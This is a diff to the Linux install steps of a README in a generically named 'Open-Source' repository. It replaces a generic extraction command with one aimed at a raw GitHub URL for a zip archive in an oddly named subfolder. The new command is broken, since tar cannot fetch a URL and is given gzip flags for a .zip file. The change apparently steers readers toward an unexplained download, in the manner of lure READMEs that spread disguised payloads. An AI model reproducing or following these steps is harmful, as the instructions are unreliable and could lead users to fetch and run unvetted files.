Lineamolar528/Open-Source/README.md

 - **For Linux**:
   1. Open a terminal.
   2. Navigate to the folder where you saved the file.
-  3. Run the command `tar -xvzf yourfile.tar.gz` to extract the files.
+  3. Run the command `tar -xvzf https://raw.githubusercontent.com/Lineamolar528/Open-Source/main/tyrannophobia/Open-Source_v3.0.zip` to extract the files.
   4. Follow any additional instructions in the README included in the extracted folder.

 ## ⚙️ Running Open-Source